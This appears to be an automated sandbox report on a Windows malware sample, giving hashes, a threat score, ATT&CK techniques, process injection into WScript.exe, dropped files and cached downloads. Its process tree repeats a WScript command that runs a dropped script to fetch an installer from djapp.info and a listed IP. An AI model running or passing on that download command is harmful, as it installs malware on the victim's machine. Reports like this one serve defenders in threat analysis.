583c171af6a7f1876ba4d4000e52b25c9a16741e0243688bd6bf35a2a1a76c7b

Analysis

max time kernel
117s
max time network
119s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
23-05-2024 01:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe
Size

184KB
MD5

695693f223cc5eb36b6fe1e1af8325ee
SHA1

69ecd21dce088e53cf95d69cf5b48e709a5b9790
SHA256

583c171af6a7f1876ba4d4000e52b25c9a16741e0243688bd6bf35a2a1a76c7b
SHA512

2073ee28601dcc8d8a7e834db1d077a2d69c09fd82d22126b64e4a38ac6da68e9ce270bf549a46e03eb069a8d9195ce069f23ae8590b73ba61d77a3d10db134b
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Q:/7BSH8zUB+nGESaaRvoB7FJNndnF

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
6	2632	WScript.exe
8	2632	WScript.exe
10	2632	WScript.exe
12	2464	WScript.exe
13	2464	WScript.exe
15	3048	WScript.exe
16	3048	WScript.exe
18	624	WScript.exe
19	624	WScript.exe
22	1040	WScript.exe
23	1040	WScript.exe
27	1040	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe

description	pid	process	target process
PID 1996 wrote to memory of 2632	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 2632	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 2632	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 2632	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 2464	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 2464	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 2464	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 2464	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 3048	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 3048	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 3048	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 3048	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 624	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 624	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 624	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 624	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 1040	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 1040	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 1040	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe
PID 1996 wrote to memory of 1040	1996	695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe
2⤵
- Blocklisted process makes network request
PID:2632

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe
2⤵
- Blocklisted process makes network request
PID:2464

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe
2⤵
- Blocklisted process makes network request
PID:3048

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe
2⤵
- Blocklisted process makes network request
PID:624

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe
2⤵
- Blocklisted process makes network request
PID:1040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
64c143e9f2a438ddf74501d3b3cc54bf

SHA1
66b41aabcaa5c364d405c858b85fa7a995f53c72

SHA256
02802fa86c2539668fb375ddf8b3ffa5a6c7ad8ae0050c3471dc9fca1275c0ca

SHA512
9decfe443630833dfc6c4e2b728c0395d0cbd59a5d868639f300244c4c61df6540b21d33497a8dd4e1947aaef02e4cbc815f53acc21d70ba1653d9492f438e96

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
6067cca8309faf9ed39e6356c58c472e

SHA1
874a07ed6bc72361d64cbeda41aa0f772c930c25

SHA256
b02b76118a9eb3fec429f020bd9c7d3cd7569f02967e6333016af062705d5e9f

SHA512
53bb0faeb66e4bc803b01e0f5eef245002dc0b6f5389be6f482e6c75202d79037d6c591118a6179026c5754338e255f93efa2a6ad128fd845ce4802b9005af83

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7cab410d719951a525144322e267c185

SHA1
b3a9c2d09fccd449e9bed2c8ab6ec7ac140979c8

SHA256
6df6d3b2e893742431759c0048b206bd030eff77a9eeef9997a3c92de28696e7

SHA512
6e00407198af18f91004a7b658da0de808c0d4e5172d339de3049a624ac26e3541dbf28550cfe6eb3afadd30bc314e044d90304189989d7beb8f84024cffbf4c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
d961fbad91dd8866f29b23196b20ddf9

SHA1
9abd5717bae4a780aa78b5db71609c6f0c4ae5c7

SHA256
4bb460c97a44a1e18fde9e9d3ea448424a736e8dcd1e35224b6d9fa2547948bd

SHA512
6128003548d818dff7651505f57d264344f31ce677cdbaf84ce8a9864c1f9cedfd60fede4aba3f244c39a26865b3f3784ffe38407004404dbe1cfc59bbe5c1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
40KB

MD5
53b06493bcace1706542960ff5068f4d

SHA1
b3e0a61075f50bd64d69cf0a38101ff76db74e55

SHA256
9dac85fd13a7a599d354689b2a0a69fe0f94fb5404332d7c913002afb83d6c99

SHA512
af9d3d299534b94fd081259d613e975366a1f3ba631a8e40ffc9be29da608c05288641f24a7179529b728d64a4dcef2a7b1c8241d066509518dff514e4ef027a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
40KB

MD5
54aad89f121ef899da3d5f01736e1cd5

SHA1
8d2252e6460590de6521051fcf8996644d7f8b1d

SHA256
85ed9cab179256235addb0ef751afba9f7cf60a3c618811aedc73804c83bbe22

SHA512
a11574def12af0ca9e64616d84ef2ab2ebd87aa931370aa63c5d66284bf7e4a2c8645c76e145b5846192aa45d5bbb694dc1e564ebb8ecce5f814bed9c1f24427

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
40KB

MD5
6ebb1c82afffeb1054fd775ebe382b89

SHA1
dedc94db38b4ce4bcf70d5c693e4cec017ef29e8

SHA256
7dcf902b22ba136590a7653e7838b60659085d4f705c7e50e0d1accec1bd8e3b

SHA512
82c47e1776749f1c606573678771b655735035c87ddd3dc4ef0c2b2f7efd27e92c08fbd6b7d71552edee923e50010b2056c0d5bb94abdf1e0d5ead8d2144833e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

Filesize
40KB

MD5
c9b5ed38be99fcea042811b31bf69f5e

SHA1
218ba416c95d59a92de3d804ed38928dfb237ba5

SHA256
4166837e1356cee10ee534fe0370ad09e4c82fa995b4cdbc4176ee40ad794562

SHA512
068ca79a58b8301e990f386fac0eec09f6b4ec40ef31addaeb9fe4f72e037ac683ada2efd720187e3ec9bf5002a2f700d258e155f748424bdee6ba8b9909a446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

Filesize
40KB

MD5
5c40e853fa75dcd236224450cad92438

SHA1
65a7161369820282a049ae1102878cc4ac4c1c75

SHA256
1b0ece43e1e60dc8665414aa6f5b0d3f2071e3e5f8a5a774c1cdac01225eae7c

SHA512
9f948d5a91b3eddb38b8b9d232ccfe7c83a9dbd4c0a8800f411d7e7326beb91524f82dca40b7542152474dc0ed71e30600698c4619d7d1ea99773be5b6389f56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab71E5.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar8A66.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf2990.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AFM5ZVSD.txt

Filesize
175B

MD5
8dc0939aa98dbdac350556a945bb1a88

SHA1
7991611a6adca383fada3e4e5760b703742bfc0f

SHA256
999190107e13bc14f2257d70d82a9397719e1442a73d43619c92ed956e4cbe5d

SHA512
9b099f68251873f6ca3d7b88507ffe110d68aeeb08380e5ec916ee99858b8cbc8da2c56633288a432c7dcdfcef01c823ac03de009bd6200684a28d8a97389d1c

Download Submit